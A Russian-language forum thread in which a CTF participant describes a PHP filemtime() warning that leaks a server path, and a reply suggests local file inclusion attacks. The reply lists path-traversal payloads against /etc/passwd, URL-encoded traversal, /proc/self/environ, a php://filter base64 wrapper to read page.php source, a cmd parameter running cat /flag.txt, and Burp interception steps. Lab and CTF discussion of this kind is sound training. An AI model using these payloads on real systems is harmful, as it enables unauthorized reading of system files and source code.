![]() |
В рамках CTF, есть PHP код на сервере и при вызове он генерит страницу с такой ошибкой внутри тега ссылки на css: "Warning: filemtime(): stat failed for path/some.css /var/www/public_html/path/page.php on line 8
" Файл действительно отсутствует по данному пути т.к. он (путь) перепутан. Пока не нашел как залить файл на сервер, возможно как-то без этого можно? Через burp? Поделитесь мыслями, как это применить |
Код:
Код:
?file=path/some.cssКод: Код:
?file=../../../../etc/passwdЕсли не работает — кодируй символы. Попробуй вместо ../ написать %2e%2e%2f (это URL-encode). Иногда сервак ест такое. Юзай Burp, чтобы ковырять запросы. Перехвати запрос к странице с ошибкой. Ищи параметр, который указывает на CSS-файл (типа css=... или file=...). Вставь вместо него пейлоад для LFI (Local File Include), например: Код: Код:
../../../../../proc/self/environКод: Код:
php://filter/convert.base64-encode/resource=page.phpКод: Код:
/* style.css */Код: Код:
?css=путь/к/твоему.css&cmd=cat+/flag.txt |
| Время: 02:13 |